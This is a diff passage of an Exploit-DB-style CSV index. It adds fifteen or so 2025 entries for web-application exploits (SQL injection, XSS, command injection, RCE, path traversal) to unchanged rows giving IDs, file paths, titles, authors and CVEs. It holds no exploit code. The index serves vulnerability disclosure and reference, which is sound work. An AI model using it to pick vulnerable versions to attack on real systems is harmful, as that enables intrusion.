 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
@@ -12065,6 +12078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 51847,exploits/multiple/webapps/51847.txt,"Magento ver. 2.4.6 - XSLT Server Side Injection",2024-03-03,tmrswrr,webapps,multiple,,2024-03-03,2024-03-03,0,,,,,,
+52170,exploits/multiple/webapps/52170.txt,"MagnusSolution magnusbilling 7.3.0 - Command Injection",2025-04-11,CodeSecLab,webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2023-30258,,,,,
 50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",2022-06-27,Vulnz,webapps,multiple,,2022-06-27,2022-06-27,0,,,,,,
 9714,exploits/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",webapps,multiple,,2009-10-17,,1,OSVDB-58288;CVE-2009-3333,,,,,
 39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple,,2016-01-14,2016-01-14,0,OSVDB-133027,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5291.php
@@ -12121,6 +12135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
 48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
+52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
 52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
 52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
 51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
@@ -12399,6 +12414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info
 50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,,
 49170,exploits/multiple/webapps/49170.txt,"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass",2020-12-02,"Aakash Madaan",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
+52185,exploits/multiple/webapps/52185.txt,"WebFileSys 2.31.0 - Directory Path Traversal",2025-04-11,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-53586,,,,,
 42106,exploits/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",webapps,multiple,,2017-06-01,2017-06-01,1,,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1197
 42066,exploits/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple,,2017-05-25,2017-05-25,1,CVE-2017-2508,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1146
 42065,exploits/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple,,2017-05-25,2017-05-25,1,,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1134
@@ -18690,6 +18706,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
 1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
+52166,exploits/php/webapps/52166.txt,"flatCore 1.5 - Cross Site Request Forgery (CSRF)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2019-13961,,,,,
 52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
 51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@@ -19343,6 +19360,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
 51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-26,1,CVE-2022-41544,,,,,
+52168,exploits/php/webapps/52168.txt,"GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2021-28976,,,,,
 4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
 645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
 25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@@ -19436,6 +19454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17992,exploits/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php?PATH_INFO' SQL Injection",2011-10-17,flyh4t,webapps,php,,2011-10-17,2017-10-17,0,CVE-2011-4066;OSVDB-76614,,,,,
 36973,exploits/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,webapps,php,,2012-03-20,2015-05-11,1,CVE-2012-4873;OSVDB-80217,,,,,https://www.securityfocus.com/bid/52622/info
 39116,exploits/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",webapps,php,,2014-03-19,2015-12-29,1,CVE-2014-2339;OSVDB-104445,,,,,https://www.securityfocus.com/bid/66228/info
+52167,exploits/php/webapps/52167.txt,"Gnuboard5 5.3.2.8 - SQL Injection",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2020-18662,,,,,
 3876,exploits/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,webapps,php,,2007-05-07,,1,OSVDB-38256;CVE-2007-2609;OSVDB-38255;OSVDB-38254;OSVDB-38253;OSVDB-38252;OSVDB-38251;OSVDB-38250;OSVDB-38249;OSVDB-38248,,,,,
 32207,exploits/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",webapps,php,80,2014-03-12,2014-03-12,1,OSVDB-104385;OSVDB-104384,,,,http://www.exploit-db.comgnupanel_lenny_squeeze_wheezy_precise_0.3.5_R4.tar.bz2,
 30082,exploits/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,webapps,php,,2007-05-25,2013-12-06,1,CVE-2007-2879;OSVDB-38139,,,,,https://www.securityfocus.com/bid/24152/info
@@ -22640,6 +22659,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40545,exploits/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,,2016-10-17,2016-10-19,0,,,,,http://www.exploit-db.comlms.zip,
 45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,,2018-10-18,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comlwt_v_1_6_2.zip,
 4680,exploits/php/webapps/4680.txt,"LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure",2007-11-29,GoLd_M,webapps,php,,2007-11-28,2016-10-20,1,OSVDB-39698;CVE-2007-6214,,,,http://www.exploit-db.comlearnloop2.0beta7.tar.gz,
+52171,exploits/php/webapps/52171.txt,"LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection",2025-04-11,"Francisco Moraga (BTshell)",webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-8522,,,,,
 23313,exploits/php/webapps/23313.txt,"Ledscripts LedForums - Multiple HTML Injections",2003-10-30,ProXy,webapps,php,,2003-10-30,2012-12-12,1,CVE-2003-1197;OSVDB-8934,,,,,https://www.securityfocus.com/bid/8934/info
 38908,exploits/php/webapps/38908.txt,"Leed - 'id' SQL Injection",2013-12-18,"Alexandre Herzog",webapps,php,,2013-12-18,2015-12-08,1,CVE-2013-2627;OSVDB-101156,,,,,https://www.securityfocus.com/bid/64426/info
 10930,exploits/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,webapps,php,,2010-01-01,,1,OSVDB-61472;CVE-2010-0980,,,,http://www.exploit-db.coml4d_stats_web.zip,
@@ -23674,6 +23694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27125,exploits/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-24,2013-07-27,1,CVE-2006-0417;OSVDB-22729,,,,,https://www.securityfocus.com/bid/16367/info
 2519,exploits/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,webapps,php,,2006-10-10,,1,OSVDB-29693;CVE-2006-5283,,,,,
 18410,exploits/php/webapps/18410.txt,"MiniCMS 1.0/2.0 - PHP Code Injection",2012-01-22,Or4nG.M4N,webapps,php,,2012-01-22,2012-01-22,0,OSVDB-82331;OSVDB-82330;CVE-2012-5231,,,,,
+52175,exploits/php/webapps/52175.txt,"MiniCMS 1.1 - Cross Site Scripting (XSS)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2018-1000638,,,,,
 49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php,,2020-12-04,2020-12-04,0,,,,,,
 44362,exploits/php/webapps/44362.html,"MiniCMS 1.10 - Cross-Site Request Forgery",2018-03-30,zixian,webapps,php,80,2018-03-30,2018-03-30,0,CVE-2018-9092,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comMiniCMS-1.10.tar.gz,
 2796,exploits/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,webapps,php,,2006-11-16,,1,,,,,,
@@ -24640,6 +24661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,,
 46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,,2019-02-25,2019-02-25,0,,,,,,
 23012,exploits/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,webapps,php,,2003-08-11,2012-11-29,1,,,,,,https://www.securityfocus.com/bid/8389/info
+52174,exploits/php/webapps/52174.txt,"NEWS-BUZZ News Management System 1.0 - SQL Injection",2025-04-11,egsec,webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-10758,,,,,
 3406,exploits/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php?sqllog' Remote File Inclusion",2007-03-04,bd0rk,webapps,php,,2007-03-03,2016-09-27,1,OSVDB-35355;CVE-2007-1340,,,,http://www.exploit-db.comletterman1.1.zip,
 31447,exploits/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,webapps,php,,2008-03-20,2014-02-06,1,,,,,,https://www.securityfocus.com/bid/28353/info
 26458,exploits/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,webapps,php,,2005-11-02,2013-06-26,1,CVE-2005-3469;OSVDB-20450,,,,,https://www.securityfocus.com/bid/15274/info
@@ -27319,6 +27341,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47438,exploits/php/webapps/47438.py,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80,2019-09-30,2019-09-30,0,CVE-2019-16692,"SQL Injection (SQLi)",,,http://www.exploit-db.comphpipam-1.4.tar.gz,
 50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",2022-01-25,"Rodolfo Tavares",webapps,php,,2022-01-25,2022-01-25,0,CVE-2022-23046,,,,,
 50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,"Guilherme Alves",webapps,php,,2022-06-14,2022-06-14,0,,,,,,
+52176,exploits/php/webapps/52176.txt,"phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2023-24657,,,,,
 20278,exploits/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,webapps,php,,2000-10-07,2012-08-06,1,CVE-2000-0919;OSVDB-472,,,,,https://www.securityfocus.com/bid/1773/info
 23558,exploits/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",webapps,php,,2004-01-20,2012-12-20,1,OSVDB-3745,,,,,https://www.securityfocus.com/bid/9458/info
 48138,exploits/php/webapps/48138.txt,"PhpIX 2012 Professional - 'id' SQL Injection",2020-02-26,indoushka,webapps,php,,2020-02-26,2020-02-26,0,,,,,,
@@ -29159,6 +29182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip,
 8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip,
 51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-29918,,,,,
+52169,exploits/php/webapps/52169.txt,"RosarioSIS 7.6 - SQL Injection",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2021-44567,,,,,
 10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,,
 11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar,
 3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar,
@@ -29177,6 +29201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20549,exploits/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",webapps,php,,2012-08-16,2012-08-16,1,CVE-2012-4668;CVE-2012-3508;OSVDB-85142;OSVDB-84741,,,,http://www.exploit-db.comroundcubemail-0.8.0.tar.gz,
 39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",webapps,php,80,2016-01-15,2016-12-28,0,CVE-2015-8770;OSVDB-132194,,,,http://www.exploit-db.comroundcubemail-1.1.3-complete.tar.gz,https://www.htbridge.com/advisory/HTB23283
 49510,exploits/php/webapps/49510.py,"Roundcube Webmail 1.2 - File Disclosure",2021-02-01,stonepresto,webapps,php,,2021-02-01,2021-02-01,0,,,,,,
+52173,exploits/php/webapps/52173.txt,"Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)",2025-04-11,AmirZargham,webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-37383,,,,,
 39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip,
 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
 46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,